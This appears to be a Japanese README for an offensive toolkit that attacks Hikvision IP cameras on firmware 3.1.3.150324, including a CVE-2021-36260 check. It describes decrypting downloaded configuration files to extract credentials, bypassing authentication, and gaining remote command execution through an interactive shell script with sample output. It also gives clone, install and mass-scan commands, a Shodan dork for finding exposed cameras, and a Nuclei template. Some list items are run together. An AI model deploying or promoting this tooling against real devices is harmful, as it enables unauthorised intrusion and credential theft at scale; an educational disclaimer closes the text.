
HikvisionExploiterは、HikvisionネットワークカメラのWebインターフェース(バージョン3.1.3.150324)におけるエクスプロイト実行とディレクトリアクセス可能性のチェックを自動化し、CVE-2021-36260の検出も行うPythonベースのユーティリティです。
HikvisionExploiter は、Hikvision IP カメラ、特にファームウェアバージョン 3.1.3.150324 を実行しているカメラの未認証エンドポイントを標的とした、強力で自動化されたエクスプロイテーションツールキットです。
次の操作を実行します:
研究者、レッドチーマー、IoT セキュリティ愛好家のために作られました。
/onvif-http/snapshot エンドポイントのスナップショット公開を検証します/System/configurationFile をダウンロードし、AES + XOR で復号して認証情報を抽出します/Security/users に対するヘッダーバイパスチェックwebLanguage インジェクションによる PUT-to-file RCE チェックlogs/ に IP:ポートごとに構造化されたログを作成ThreadPoolExecutor を使用して数千のターゲットをサポートpip install -r requirements.txtffmpeg (オプション、将来のスナップショットからビデオへの変換機能用)pycrypto (設定ファイルの復号用):
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
次の形式で targets.txt ファイルを作成します:
IP:PORT
例:
192.168.1.10:80
10.10.10.20:81
python3 checker.py
これにより次のことが実行されます:
logs/IP_PORT_TIMESTAMP/ に保存脆弱なデバイス上で対話的にコマンドを実行するには:
chmod +x shell.sh
./shell.sh <ip:port>
例:
./shell.sh 192.168.1.10:80
脆弱な場合、対話型シェルが起動します:
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
公開された Hikvision カメラを見つけるには、次の Shodan dork を使用します:
3.1.3.150324
Nuclei 互換テンプレートが含まれています: nuclei-template.yaml
使用方法:
nuclei -t nuclei-template.yaml -list targets.txt
検出内容:
MIT ライセンス ©
詳細は LICENSE をご覧ください。
Telegram: @HexBuddy127001
教育および倫理的な研究のみを目的として ❤️ を込めて作成されました。